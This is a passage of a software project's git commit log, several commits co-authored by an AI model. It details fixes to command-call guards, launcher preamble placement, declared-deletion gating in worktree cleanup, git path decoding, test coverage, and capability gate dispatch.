and HOST_COMMAND_ROUTERS (which carries verification, planning, uat, stats,
todo and windows, all absent from the banner).

Widening it immediately caught a live offender the first pass had missed:
references/planning-config.md prescribed `node <shim> worktree set-baseref`
with no path. Fixed here.

Also drops the "a hyphen or a dot means subcommand" heuristic, which was
unsound for prose -- it flagged `built-in` and `v1.2`. Detection now keys
entirely on the roster, testing the first dot-segment so that phase.add and
state.patch still match while prose does not. Both false positives are pinned
as negative-space rows.

Guard verified against the pre-fix tree at origin/next: 52 offenders across 25
files, and 0 after this branch's remediation.

Refs #3809

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>

* fix(#3809): derive the verb roster from the router; repair launcher parity

Standards review caught the guard repeating the defect it exists to prevent.
Its verb list was a hand-copied literal -- and worse, transcribed from an
INSTALLED older binary, so it was missing 22 verbs this tree actually ships
(websearch, windows, state-snapshot, context-predicates and the dispatch-*
family among them). gsd-tools.cjs already carries three hand-maintained
rosters whose drift is a named defect pinned by the parity test in
tests/commands.test.cjs; a hand-copied fourth was that same defect wearing a
guard's clothes.

The roster is now derived from HOST_COMMAND_ROUTERS + TOP_LEVEL_USAGE, lazily
and memoised, with `query` supplemented explicitly -- it dispatches through
the routing hub ahead of the host-router table, so it appears in neither
export, yet 45 of the 50 offenders used it. A parity test pins the derivation.

Two regressions this branch introduced, both caught by the remote runner:

  - runtime-launcher-parity: rewriting a comment in gsd-research-synthesizer.md
    put a `gsd_run` token at line 65 while the canonical preamble sits at 158,
    breaking "exactly ONE preamble, before the first gsd_run call". The comment
    is descriptive and needs no command token at all; it now names none.
  - The #2751 guard's PROSE_ALLOWLIST entry for that same line went stale once
    the line stopped carrying a bare mention. Pruned, exactly as that guard's
    own stale-entry test instructs.

Also corrects git-planning-commit.md, where the first pass rewrote only the
trailing "legacy" clause and left the sentence reading backwards.

Note the #2751 guard and this one are complementary, not duplicates: its regex
requires whitespace immediately after `gsd-tools`, so it cannot match the
`.cjs` form, and this one only matches the `.cjs` form.

Refs #3809

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>

* fix(#2751): extend the bare-command guard to references/ and commands/

The #2751 guard has only ever scanned agents/ and gsd-core/workflows/. Two
runtime-loaded directories were never in its scan set, and 47 bare
`gsd-tools <verb>` calls had accumulated there unseen -- the same defect that
guard exists to catch, in the rooms it never entered.

  - gsd-core/references/: 37 calls, all rewritten to gsd_run. references are
    fragments inlined into a parent that defines the launcher, which is why 21
    of the 22 files already using gsd_run carry no local preamble.
  - commands/gsd/: 10 operative calls rewritten. The remaining 10 are
    descriptive prose ("resolved inside the workflow via ...") and are
    allowlisted with reasons, bringing PROSE_ALLOWLIST to 15.

commands/ also came under launcher propagation. sync-runtime-launcher.cjs
walked only WORKFLOWS_DIR and AGENTS_DIR, so every preamble under commands/
was a hand-pasted copy nothing propagated and no test checked -- graphify.md
had accumulated five. It now walks COMMANDS_DIR too, which collapses those
five to the canonical one-per-file, and runtime-launcher-parity gains a
(B-commands) arm mirroring (B-agents) exactly so the placement stays honest.

The parity arm keys on shell blocks, so commands/gsd/workstreams.md and
config.md -- which name gsd_run only in inline backtick prose -- are exempt,
as they should be. gsd_run is itself a shipped npm bin, so those inline
instructions resolve from PATH exactly as the gsd-tools form they replace did.

skills/ is deliberately NOT added to either guard's scan set: it is generated
from commands/ and pinned by lint:generated-sync, so guarding the source
guards both, and scanning the mirror would double-report every future
offender. Regenerated here.

Refs #2751, #3809

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>

* test(#3809): acknowledge the one emitted file this change grows

The emitted-attribution gate failed on the previous sha: gsd-research-synthesizer.md
grew 3 bytes (13847 -> 13850) with no acknowledgment. The substitution SHRANK the
other 19 emitted files, which is why the growth arm was not expected to fire at all.

The 3 bytes are unavoidable. Line 65 is a descriptive comment inside a fenced block;
naming any command there puts a gsd_run token ahead of the file's canonical preamble
at line 158, which runtime-launcher-parity's (B-agents) arm correctly rejects. So the
comment names no command and says where the config is actually loaded instead, which
reads longer than the token it replaced.

Acks only the path the gate reported, per the fragment rules.

Refs #3809

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>

* revert(#2751): drop the commands/ half — three contracts pin it in place

The remote runner refuted the commands/ extension outright. Reverting it and
keeping the references/ conversion, which passed.

What broke, all of it caused by bringing commands/ under launcher propagation:

  - graphify.md's five per-block preambles are LOAD-BEARING, not accumulated
    drift. tests/graphify-visualization.test.cjs extracts individual Step-3
    shell chains and executes them standalone, so each fenced block needs its
    own definition of gsd_run. Collapsing them to the canonical one-per-file
    produced `bash: gsd_run: command not found`, exit 127, across four tests.
    The "define once per file" contract holds for workflows and agents because
    nothing extracts their blocks in isolation; commands/ is not like that.
  - explore.md broke "the preamble that DEFINES gsd_run must appear before the
    first USE of gsd_run anywhere in the file".
  - tests/gsd-tools-path-refs.test.cjs (#1766) ASSERTS that
    commands/gsd/workstreams.md contains the literal string
    `gsd-tools query workstream.list`. Rewriting it to gsd_run contradicts a
    test that pins the opposite, so the two guards disagree about that file by
    construction.

So commands/ is not a scan-set widening. It needs those contracts reconciled
first, and that is its own change. SCAN_DIRS keeps gsd-core/references/ and
drops commands/, the ten commands/ allowlist entries go with it (back to 5),
and the reasoning is recorded in the guard itself so the next person does not
rediscover it by burning a matrix run.

commands/gsd/import.md keeps its #3809 fix — that one is the .cjs form this
PR exists to remove, and it is untouched by any of the above.

Refs #2751, #3809

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>

* revert(#3809): restore explore.md's Step 1 preamble placement

Running the launcher sync script processed workflows/ and agents/ too, not
just the commands/ directory the run was aimed at, and it MOVED
gsd-core/workflows/explore.md's preamble from Step 1 down to Step 3.

The script inserts into the first bash block that USES gsd_run. explore.md's
Step 1 block only DEFINES it, and that placement is deliberate -- the file
says so on the line above: "Placed in Step 1 rather than Step 3 so declining
the research offer cannot leave Step 5's commit call unbootstrapped."
tests/explore-command.test.cjs pins it.

explore.md carried no #3809 offender, so reverting it costs this fix nothing.
This was collateral from invoking the sync script at all, not from the
COMMANDS_DIR change, which is why the earlier commands/ revert did not catch it.

Refs #3809

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>

* chore(#3809): backfill PR number into changeset fragments

pr:0 -> pr:3815 for both fragments now that the PR exists.

Refs #3809

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>

* fix(#3809): drop the hand-rolled regex escaper CodeQL flagged

CodeQL raised js/incomplete-sanitization (HIGH) on the guard's pattern build:
`SHIM.replace(/\./g, '\\.')` escapes the dot and nothing else, so it does not
escape backslashes. It blocked PR #3815.

The repo already bans this shape -- local/no-adhoc-regex-escape exists exactly
to stop hand-rolled escapers, with the canonical one in src/pattern.cts. Rather
than reach for that helper, the pattern now carries no escaping logic at all:
SHIM is a compile-time constant whose only metacharacter is the dot, so the
regex source is spelled out literally. The generated source string is
byte-identical to what the replace() produced, verified before and after --
0 offenders on this tree, 52 against origin/next, unchanged.

A drift pin asserts SHIM_PATTERN still matches SHIM exactly, and that the dot
is escaped rather than acting as a wildcard, so the two cannot separate.

Refs #3809

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>

---------

Co-authored-by: sim <sim@local>
Co-authored-by: Claude Opus 5 <noreply@anthropic.com>
2026-08-24 11:47:37 -04:00
Tom Boucher
8ed105c8a4 fix(#3684): resume verified-unmarked phases at update_roadmap (#3814)
* test(#3684): failing-first rows for the verified-unmarked resume

* fix(#3684): resume verified-unmarked phases at update_roadmap

* test(#3684): heading-shaped roadmap fixture, plain phase.complete calls

* fix(#3684): fit under the pre-phase-6 margin, fix pins and verify call

* fix(#3684): padding-normalize the marked-complete join, assert STATE idempotency

* test(#3684): anchor fixes, node jq mirror, characterized STATE delta

* chore(#3684): backfill changeset pr number

---------

Co-authored-by: sim <sim@local>
2026-08-24 10:58:04 -04:00
Tom Boucher
4b84be1da4 fix(#3683): wire gated learnings extraction into completion, align copy path (#3810)
* test(#3683): failing-first rows for learnings source resolution and wiring pins

* fix(#3683): wire gated learnings extraction into completion, align copy path

* test(#3683): register the learnings suite in the docs-guard lane, drop unverified markers

* fix(#3683): close review findings — per-item parsing, readdir guards, docs paths

* fix(#3683): route phase enumeration through the locator seam, fix assertion targets

* fix(#3683): merge execute-phase ack into the 3003 fragment, fix fidelity targets

* fix(#3663): replace the spent execute-phase ack entry with the 3683 re-arm

* chore(#3683): backfill changeset pr number

---------

Co-authored-by: sim <sim@local>
2026-08-24 09:23:01 -04:00
Tom Boucher
2f86278b5e fix(#3003): opt-in mechanism for intentional deletions in worktree.cleanup-wave (#3757)
* test(#3003): failing-first suite for declared deletions in cleanup-wave

Binds the guard's opt-in before it exists, so the suite is RED against next.

The rows that carry the weight are the over-authorization set: a directory
declaration must not authorize its children, a glob declaration must authorize
nothing, and a declaration must not act as a string prefix of another path.
Each of those BLOCKS, and each would PASS under a prefix, glob, or startsWith
matcher — which is how a path list quietly degrades into the boolean opt-in
#3003 explicitly rejected. The glob row matters most: declaredScopePrefix
already returns null ("matches everything") for a glob-leading pattern, correct
for the advisory it serves and catastrophic for a gate.

Also pinned: a failed deletion check blocks on its own reason rather than being
filtered into a pass; the block detail names only the undeclared residue so the
operator is not misdirected by paths that were fine; an entry with no
declaration blocks exactly as before; junk and non-array declarations do not
authorize; and a blocked entry still isolates rather than aborting the wave
(#2852, which must stay fixed).

Two advisory rows cover an interaction found while designing: git diff
--name-only includes deleted paths, so without unioning the declaration into
the #2596 scope check, authorizing a deletion would raise
SCOPE_OUT_OF_DECLARED against the very path just authorized.

A seeded property states the whole invariant the three over-authorization rows
sample: a deletion merges iff its normalized path is in the declared set.

* feat(#3003): declared deletions opt-in for the cleanup-wave guard

The deletions guard blocked the merge-back of any executor branch whose diff
removed a file, with no way to say a removal was intended. A plan that folded
one test file into a sibling could not be merged by the tool meant to merge it,
forcing a manual --no-ff outside the tool -- strictly less safe than what the
guard protects against.

A plan now declares removals in its own frontmatter (files_deleted), and that
list rides the same path files_modified already travels: plan-document parse ->
phase plan JSON -> the per-plan worktree gate -> record-agent/create
--deletions -> declared_deletions on the manifest entry -> the guard. The guard
blocks only the deletions NOT in that list.

A path list rather than a boolean, per the pinned decision: a boolean disarms
the guard for the whole entry, so an unexpected deletion riding along with a
declared one would pass unnoticed. Matching is exact after the module's shared
normalizer -- never a prefix, never a glob. Both would let one declaration
authorize a whole set, which is the mass-deletion accident the guard exists to
catch. That also means declaredScopePrefix is deliberately NOT reused here: it
returns null ("matches everything") for a glob-leading pattern, which is right
for the advisory it serves and would silently disarm a gate.

The block detail now carries only the undeclared residue, so an operator is not
sent looking at paths that were fine. A failed deletion check still blocks on
its own reason and is never filtered into a pass. A blocked entry still
isolates rather than aborting the wave (#2852).

The #2596 scope advisory unions the declaration into its declared set --
git diff --name-only includes deleted paths, so without that, authorizing a
deletion would immediately warn that the same path was out of declared scope.

Optional and additive throughout: files_deleted is absent from
PLAN_REQUIRED_FIELDS, a manifest entry without declared_deletions keeps the
original unconditional block, and omitting --deletions leaves the on-disk entry
shape untouched.

Supersedes the spent #2856 emitted-drift ack entry for execute-phase.md, the
same supersede that entry performed on #3370 and #3370 on #3324.

* fix(#3003): wire --deletions on every dispatch surface, not just one

Review found the feature inert on two of three dispatch paths. execute-phase.md
(harness inline) passed --deletions, but the orchestrator-worktree path
(executor-isolation-dispatch.md, worktree.create) and the Fleet-parallel batch
path (capabilities/claude-orchestration/fragments/execute-wave-pre.md,
worktree.record-agent) still passed only --files. A plan declaring
files_deleted would have merged on one path and been blocked on the other two
-- the exact bug #3003 exists to fix, left unfixed where most of the isolation
actually runs.

Worse, per-plan-worktree-gate.md already claimed --deletions was passed 'on the
same worktree.record-agent / worktree.create calls', which was false for both
untouched sites. A doc asserting coverage that does not exist is how a gap
survives review.

All four surfaces now pass the flag, verified by sweeping every .md under
gsd-core/, capabilities/, commands/, skills/ and agents/ that invokes
worktree.record-agent or worktree.create: each one that passes --files now also
passes --deletions. The isolation-dispatch note explains why this flag, unlike
--files, is not advisory -- omitting it does not skip a check, it blocks a
merge the plan declared.

Regenerates capability-registry.cjs, which the fragment edit made stale.

Neither newly-grown file needs an emitted-drift ack: executor-isolation-dispatch.md
sits under workflows/execute-phase/steps/ and execute-wave-pre.md under
capabilities/, both outside currentSizes()'s non-recursive scan of
gsd-core/workflows/ and agents/.

* docs(#3003): document files_deleted where a plan author will actually find it

The feature's entire user surface is one plan-frontmatter field, and the
canonical reference for that frontmatter -- docs/reference/plan-md.md, the table
that documents every other key -- never mentioned it. A field nobody can
discover ships as a field nobody uses. Adds the files_deleted row and an example
entry in all five locales (en, ja-JP, zh-CN, ko-KR, pt-BR), stating the property
that makes the opt-in safe: matching is exact per path after separator
normalization, with no globs and no directory prefixes, so a declaration can
never authorize more than it literally lists, and omitting the field keeps the
guard's original unconditional block.

Also corrects two claims in the scope-conformance how-to that this change made
false. Its opening paragraph described the recorded declared scope as
files_modified alone; declared_deletions is now unioned into that comparison.
Its "Renames are not detected specially" bullet asserted the deletions guard
blocks any entry whose diff contains a deletion, full stop -- which was the
whole point of #3003 and is no longer true. Reworked to say what now decides a
rename's fate: declare the old path in files_deleted and both halves become
ordinary paths for the advisory check, which is also why the old path needs no
separate files_modified entry.

Documentation that describes the pre-change behavior of the thing being changed
is worse than no documentation, because a reader trusts it.

* fix(#3003): close every review finding on the declared-deletions opt-in

Two independent isolated reviewers, correctness and security. Neither found a
blocker; both found real defects, and the directive treats a finding at any
severity as blocking. All of them are fixed here.

MAJOR -- the submodule worktree gate could not see a deletion-only plan.
per-plan-worktree-gate.md intersected $SUBMODULE_PATHS against $PLAN_FILES
alone, while $PLAN_DELETIONS was extracted and then never used. Before
files_deleted existed, a path had to appear in files_modified to be planned at
all, so the gate saw it; the new field plus the new docs telling authors a
deleted path needs no files_modified entry opened a hole where a plan whose only
submodule touch is a removal kept worktree isolation on -- the exact case #2772
disabled it for. Both channels now feed the intersection. Note the posture is
deliberately the OPPOSITE of the cleanup-wave guard: there the channels stay
apart because a deletion AUTHORIZATION must never be inferred; here they merge
because a safety fallback must never MISS a touch.

MAJOR -- same-wave conflict detection could not see a deletion. The planner's
implicit-dependency rule compared files_modified only, so plan A editing
src/x.ts and plan B declaring files_deleted: [src/x.ts] scored as conflict-free
and ran in parallel: one branch removing what the other is writing, which is the
sharpest conflict there is. Overlap is now computed across both channels.

MINOR (both reviewers, one root cause) -- the advisory union gave one field two
matching rules. declared_deletions was unioned into the scope list handed to
planWaveScopeConformance, which reads it with prefix-and-glob semantics. So a
field that is exact-match-only at the gate silently became wider at the
advisory: ["*.md"], inert at the gate, yielded a null prefix meaning "matches
everything" and muted the advisory completely, and ["src"] muted all of src/.
The union also activated the advisory on plans that declared no modification
scope at all, warning on every modified path. Replaced with subtraction from the
findings, gated on files_modified alone. One field, one rule, everywhere.

MINOR -- core.quotepath made the feature silently inert for non-ASCII paths.
git emits "tests/\303\251.ts" C-escaped and quoted, which never equals the
declared plain path, so a correctly declared deletion of tests/é.ts would block
forever with nothing pointing at the encoding. Both diffs now pass
-c core.quotepath=false.

NIT -- flag() consumed a following flag as a value, so --deletions --files x
swallowed --files and dropped both. Now treated as a missing declaration, which
fails closed. Fixed at both call sites; the helper is duplicated verbatim in
cmdWorktreeRecordAgent and cmdWorktreeCreate and leaving one would reintroduce it.

TEST -- one test passed for the wrong reason. "a declared deletion is in scope
for the advisory" asserted only that warnings omit the deleted path; under a
full revert the entry blocks first, warnings come back empty, and the negative
assertion passes anyway. It now asserts the entry actually merged, which is the
load-bearing half. Four regressions added, one per fix above.

Docs corrected rather than extended. The rename bullet in the scope-conformance
how-to claimed a rename whose delete side is undeclared never reaches the
advisory. Verified false: git's rename detection is on by default, so a pure
rename is a single R entry that appears in no --diff-filter=D output and was
never gated, before or after #3003. Only a rename that edits enough to fall
below the similarity threshold decomposes into add+delete. The pre-existing
sentence made the same wrong claim; this restates it correctly instead of
sharpening the error. The localized plan-md.md reference edits are reverted:
the PR template requires docs content added here to be English, and the
translations already lag by three fields, so English-only is the repo's
standing posture, not an oversight.

Agent-file size caps respected: gsd-planner.md is XL-tier by bytes but carries a
separate 49152-LF-CHAR cap asserted by four suites, so its edit is deliberately
terse and lands at 49141 with 11 chars of headroom, with the rationale moved to
docs/reference/plan-md.md, which has no cap. gsd-plan-checker.md lands at 49107
bytes, 45 under the LARGE cap. Both acks merged into the existing fragments that
already name those paths, since two ack sources may never name the same path.

* fix(#3003): decode git's path quoting instead of changing the git argv

The previous commit's non-ASCII fix turned the remote suite red: 44 failures,
42 of them "unexpected git call: -c core.quotepath=false diff --diff-filter=D
--name-only ...". The suite's git mocks match on exact argv, so adding two
flags to the deletions diff and the advisory diff invalidated every existing
fixture in tests/worktree-safety.test.cjs. Rewriting dozens of fixtures to
accommodate one flag would be paying a large Hyrum's-law bill to fix a small
defect.

Both execGit calls are reverted to their original argv. The C-quoting is now
decoded in normalizeScopePath instead, via a new decodeGitQuotedPath helper.
That is the better fix on its own merits, not merely the cheaper one: the git
argv is untouched so no fixture moves, the decode lands on the ONE normalizer
already applied to both sides of the comparison so the declared and reported
paths cannot disagree, and it holds regardless of the user's own core.quotepath
setting rather than only when we remember to override it.

A value not wrapped in a leading AND trailing quote is returned completely
untouched, so the plain-ASCII path -- the overwhelmingly common case -- is
byte-identical to before. Escapes decode to BYTES collected into a Buffer and
UTF-8 decoded only at the end, because \303\251 is two bytes forming one
character and decoding them separately yields mojibake. Malformed input never
throws: a trailing lone backslash or a short octal escape degrades to the
literal character, since one bad path must not take down a cleanup wave.

Caught while reviewing the helper: the non-escape branch pushed a UTF-16 code
unit rather than UTF-8 bytes. Git always escapes non-ASCII so its own output was
fine, but this normalizer runs on the DECLARED side too, and an author may write
a quoted path holding a literal é -- pushing 0xE9 alone is invalid UTF-8, so the
declaration would decode to a replacement character and silently stop matching.
That is precisely the failure this change removes, reintroduced on the other
side of the comparison. Now converts whole code points, surrogate pairs intact.

The other 2 failures: tests/parallel-dependent-plans.test.cjs pins the exact
unbackticked substring "files_modified overlap" in gsd-planner.md, and rewording
that comment to "declared-scope overlap" deleted it. The comment is restored
verbatim and the files_deleted change rides in the pseudocode and the Rule
sentence instead. Recorded in the ack fragment so the next contributor does not
rediscover it the same way.

Four regression tests cover the decode through the public cleanup-wave seam
(the helper is module-private): a declared non-ASCII deletion merges against a
C-quoted git report, the symmetric case where the DECLARATION is the quoted
form, an undeclared non-ASCII deletion still blocks with the residue naming the
decoded path an operator can act on, and a path merely containing a quote is
left alone. Plain ASCII was already covered and is not duplicated.

* fix(#3003): revert the leading-dash flag guard, the review nit was wrong

The remote suite came back with 2 failures, down from 44, and both point at the
same thing: tests/worktree-safety.test.cjs:7045 already pins the opposite
contract, deliberately.

  test('a flag-shaped --files value is not re-parsed as a flag', ...)
    recordAgent(['--files', '--branch'])
    -> files_modified === ['--branch']
    -> branch === 'worktree-agent-a1'  ("the real --branch value must be untouched")

So consuming the next argv element positionally, whatever its shape, is the
tested intent of this parser, not an oversight. The security reviewer's nit
claimed --deletions --files x would "swallow --files and drop both". It does
not: each flag runs its own indexOf, so --deletions records the literal
'--files' while --files independently still resolves to x. And that literal is
a path git never reports as deleted, so it authorizes nothing -- already
fail-closed with no guard at all. The guard bought no safety and silently
changed --files behavior along the way, outside this issue's scope.

Reverted at both call sites, which are byte-identical again, along with the test
asserting the reverted behavior and the docs sentence describing it. The nit is
recorded as REJECTED in the review artifact with the reasoning above, rather
than as fixed -- a finding that turns out to be wrong should leave a trace of
why, or the next reviewer files it again.

docs/CLI-TOOLS.md now states the positional-read behavior plainly instead, so
the next person meets it as documented intent rather than rediscovering it
through a red suite.

* chore(#3003): backfill changeset pr number to 3757

* test(#3003): cover parsePlanDocument's filesDeleted branch to clear the mutation gate

CI's Stryker shard for plan-document failed at 73.28 against a break threshold
of 75: 170 killed, 62 survived, 232 total. Eight of those survivors are the
filesDeleted block this issue added to parsePlanDocument, which shipped with no
direct coverage at all -- the field was exercised end to end through the
cleanup-wave tests, but the parser itself was never called with a plan that
declares it, so every mutant in the block lived.

Four tests, each pinned to specific mutants rather than written for coverage
percentage:

- absent key yields exactly [] -- kills the array-literal seed
  (["Stryker was here"]) and the `fmDeleted = true` conditional, which would
  otherwise produce ["true"]
- a scalar underscore `files_deleted:` wraps into a one-element array -- kills
  `fmDeleted = false`, the `&&` logical-operator swap, the `fm[""]` string
  mutation on the first operand, the emptied if-block, and the ternary's
  non-array branch
- an array-valued hyphenated `files-deleted:` maps element-wise -- kills the
  `fm[""]` mutation on the SECOND operand (only reachable when the legacy
  hyphen alias is the one carrying the value) and the ternary's array branch
- an empty list yields [] -- boundary case, and a genuinely distinct one from
  the absent key: [] is truthy in JS so it ENTERS the if, and only
  Array.isArray's true branch mapping over nothing produces the same []

Threshold arithmetic: 174 of 232 are needed for 75%, and these take it to about
178, so the shard clears with margin rather than landing on the line.

Every expected value was confirmed by executing the built parser before being
asserted, not inferred from reading the source.

---------

Co-authored-by: sim <sim@local>
2026-08-22 13:17:51 -04:00
Tom Boucher
2b42b28687 fix(#3659): make the worktree base-check trust evidence, not baseRef (#3736)
* test(#3659): baseref-head suppress must be mode-aware regression rows

* fix(#3659): make baseref-head suppress mode-aware and thread isolation mode

* fix(#3659): review fixes - stale advice purge, message pins, mode alias

* fix(#3659): pick-interceptable emit seam, ack merge, writeSync pin

* test(#3659): rewrite set-baseref pin, fix writeSync row stub

* chore(#3659): backfill changeset pr number

---------

Co-authored-by: sim <sim@local>
2026-08-21 04:58:33 -04:00
Tom Boucher
14679b866b enhance(#2856): add default-off live-DOM UAT capability (#3716)
* test(#2856): add failing-first suite for the live-dom-uat capability

Binds the approved triage shape before any of it exists:

- containment — the execute:wave:post hook must not render unless
  workflow.live_dom_uat is true AND the capability resolves active
  (fail-closed on a missing state entry, and on a non-boolean value)
- criterion 4 — agents/gsd-executor.md carries no browser MCP family;
  asserted as an absence, which is the only way it is observable
- Hyrum guard — the pre-existing mcp__playwright__* branch must stay
  outside the key-gated block, or upgrading silently removes working
  automated UI verification for every current Playwright-MCP user
- parity — the browser glob list now lives in two surfaces (agent
  frontmatter + workflow detection block); the assertion fails if
  either gains or loses a family without the other

Red by construction: the capability, agent and workflow block do not
exist yet. Verified on the remote runner.

Refs #2856

* enhance(#2856): add default-off live-DOM UAT capability

A phase whose acceptance criteria needed a live DOM could not be
finished by the agent that executed it: gsd-executor carries no browser
tools, so it correctly returned checkpoint:human-action even though the
work was not human-only, just tool-less. Every such phase degraded to
"executed, then finished by hand in the orchestrator", and autonomous:
false could not distinguish "a human must judge this" from "the executor
lacks the tool".

Implements the shape approved at triage, not the one reported. The
executor's tools: line is NOT widened, in any configuration: for a
first-party agent the static list is the only control that exists
(ADR-1244 D2, ADR-857 D4, no per-dispatch override). Instead one
default-off capability owns the key, the agent, and the step:

- capabilities/live-dom-uat/ — activationKey workflow.live_dom_uat
  (boolean, default false), one additive step at execute:wave:post
  (onError: skip, gates: []), so it can never halt a wave
- agents/gsd-dom-verifier.md — the only GSD agent carrying browser MCP
  globs, in its own tools: line, with no Bash
- verify-work automated_ui_verification — a gsd:live-dom-families block
  naming both new families AND the key; presence alone never activates

Two independent fail-closed gates: isCapabilityActive renders a hook
only on state.active === true, plus the step's own `when`.

The pre-existing mcp__playwright__* branch keeps the gating it already
had and stays outside the new block. Pulling it behind a default-off key
would have silently removed working automated UI verification from every
current Playwright-MCP user on upgrade.

Also closes a host gap this surfaced: execute:wave:post dispatched only
contribution + gate, so ANY registered step was declared and silently
never run — exactly the single-kind hand-roll loop-hook-dispatch.md
names. Step 5.75 now dispatches every kind == "step".

The browser-profile lock is tolerated, not coordinated: --isolated is a
flag on the operator's own MCP-server registration that GSD neither
launches nor parameterizes, so the verifier reports could_not_look /
profile_locked, names the flag, and stops. DOM-VERIFY.md keeps
could_not_look and nothing_to_report distinct behind a closed reason
enum — collapsing them is the ambiguous-run-notes defect reported.

Verified on the remote runner.

Closes #2856

* fix(#2856): apply review findings from the orthogonal passes

Correctness pass (blocker):
- delete detectionBlockIsCrlfSafe. It was pass-always: it read the file,
  replaced LF with CRLF, then indexOf'd marker strings that contain no
  newline, so the replacement could not change the result and the
  assertion could never fail for the reason it stated. There is no real
  CRLF risk on this surface either — the gsd:live-dom-families block has
  no parser, only human and agent readers. Deleted rather than replaced,
  per the repo's pass-always-test rule.

Isolated security pass (two minors, both real):
- execute-phase.md step 5.75: this change is what first activates
  kind == "step" dispatch at execute:wave:post, which newly opens the
  ref.command shell path at that loop point. Our own step uses ref.agent
  and never touches it, but the door is now open, so the step-dispatch
  line carries the same in-context validate-before-shell warning the
  sibling gate-dispatch line directly below it already carries.
- gsd-dom-verifier: quoted page text in DOM-VERIFY.md is attacker
  influenced. Require it wrapped in inline code or a fence, kept short,
  and never left reading as a directive to the next reader.

Verified on the remote runner.

Refs #2856

* fix(#2856): settle the new-agent roster ripple

Checkpoint 2 returned 28 failures, none in the new suite — all of them
the guards that exist to make adding an agent a deliberate act. Each is
a real boundary that had to move:

- docs/AGENTS.md: Tools row must copy the frontmatter verbatim (#2526),
  so the browser globs lose their backticks; primary-agent counts 21->22,
  roster 33/34->34/35, Verifiers category 1->2
- docs/INVENTORY.md: roster completeness requires every agents/gsd-*.md
  to be classified exactly once
- gsd-dom-verifier: add the anti-heredoc instruction and the commented
  hooks: frontmatter pattern both agent gates require
- gsd-core/bin/shared/model-catalog.json: every shipped agent needs a
  profile entry (#3229)
- copilot-install / kilo-upgrades / qwen-upgrades: expected agent list
  and the 34->35 roster boundary
- execute-wave-post-gate-pipeline-e2e: execute:wave:post legitimately
  carries one step now. Asserted as an exact shape — one step, capId
  live-dom-uat, ref.agent gsd-dom-verifier, onError skip — so it stays a
  real guard against accidental change rather than being relaxed

Two findings worth naming:

mcp-tool-inheritance (#2526) rejected the agent for documenting
mcp__playwright__* while its tools: line withholds it — a dead
instruction that invites the agent to claim a path it cannot take. The
prose now names the Playwright MCP family without the dispatchable
token, in both the agent and the capability fragment.

runtime-launcher-parity rejected the new gsd_run call: each fenced block
is its own shell, so a workflow step file invoking gsd_run needs its own
canonical preamble. Propagated with scripts/sync-runtime-launcher.cjs.
That script also normalizes explore.md, which is unrelated pre-existing
drift the parity check tolerates, so it is reverted to keep this diff
scoped.

The emitted-drift ack supersedes the spent #3370 entry for
execute-phase.md — it is merged into next, so its ripple is absorbed at
the base and it can no longer clear anything. That is the same supersede
the #3370 entry itself performed on the spent #3324 fragment. Its
unrelated execute-plan.md entry is untouched.

Verified on the remote runner.

Refs #2856

* fix(#2856): drop the stale emitted-drift ack entry

The automated-ui-verification.md entry was written speculatively rather
than from a reported growth, and the check names that precisely: an ack
"written or reworded in THIS diff, but nothing here needed it, so it
explains nothing".

The growth tier keys on the bare filename as it appears under
gsd-core/workflows/ or agents/. automated-ui-verification.md is nested
under verify-work/steps/, so it was never in the tracked set — only
execute-phase.md was ever reported, both before and after the launcher
preamble landed.

Only ack what the check actually reports.

Verified on the remote runner.

Refs #2856

* chore(#2856): backfill changeset pr number

pr:0 -> 3716. The placeholder fails both changeset-lint
(fail_invalid_fragment) and docs-lint (fail_malformed_fragment) by
design and can only be resolved once the PR number exists. Both now
report ok against GITHUB_BASE_REF=next.

Refs #2856

---------

Co-authored-by: sim <sim@local>
2026-08-20 15:07:21 -04:00
Tom Boucher
ea594300d9 fix(#3606): validate hook-kind coverage at call sites and dispatch generically (#3687)
* test(#3606): pin hook-kind coverage in the wired guard

* fix(#3606): validate hook-kind coverage at call sites and dispatch generically

* fix(#3606): address review - segment-granular narrowing, zero-coverage diagnosis, quick.md, fragment extraction

* fix(#3606): drop stale shrink-ack, export HOOK_GROUP_KINDS, dedupe scanner regex

* chore(#3606): regenerate install-tree fixtures for new wave-post fragment

* chore(#3606): sync canonical launcher preamble into new fragment

* fix(#3606): keep fragment preamble ahead of first gsd_run mention

* fix(#3606): revert sync script's preamble move in explore.md

* chore(#3606): regenerate derived manifests post-rebase

* chore(#3606): allowlist peer test files - base was red on the count lane

* chore(#3606): regenerate inventory for peer's verify-command-grounding doc

* chore(#3606): grounding test maps to its own module by longest prefix

* chore(#3606): backfill changeset pr number

---------

Co-authored-by: sim <sim@local>
2026-08-19 16:41:27 -04:00
Tom Boucher
fba3b9c24f fix(#3559): dispatch every ship:pre capability gate, not two hardcoded capIds (#3608)
* test(3559): failing-first coverage for generic ship:pre gate dispatch

ship.md's preflight resolves every active ship:pre gate then enforces exactly two
hardcoded capability IDs, so a third-party capability's blocking gate is resolved,
evaluable, and silently dropped. These tests fail on that dispatch dead-end and
pin the generic evaluator contract the fix will drive.

* fix(3559): dispatch every ship:pre gate generically, not two hardcoded capIds

ship.md's preflight resolved every active ship:pre gate via render-hooks and then
enforced exactly two capability IDs — security and broken-windows. Every other
capId, including any third-party capability's blocking gate, was resolved,
evaluable, and silently dropped: a phase shipped past its own declared failing
gate with nothing evaluated and nothing warned.

Preflight now iterates every active kind=="gate" entry in array order, dispatching
by check shape through the generic evaluator (gsd_run check predicate, ADR-2008)
and honoring each gate's own blocking and onError — the contract execute:wave:post,
execute:post and plan:post already implement and references/loop-hook-dispatch.md
already specifies. docs/how-to/command-exit-zero-gate.md already documented ship:pre
as auto-dispatching, so this restores documented behavior rather than changing it.

security and broken-windows are retained verbatim as named specializations INSIDE
the loop, so their bespoke fail-closed reads are unchanged and every gate is visited
exactly once — no double-enforcement is representable.

Also corrects two CONTEXT.md predicates that described the hardcoded shape, and the
test file's header note claiming ship:pre has no runnable evaluator (stale since #2008).

Fixes #3559

* fix(3559): validate third-party gate checks in-context before any shell use

Adversarial + security review of the generic dispatch arm this PR introduces.

SECURITY (introduced by this PR): the new every-other-capId arm is the first path
on which a THIRD-PARTY capability manifest string reaches a shell at ship:pre —
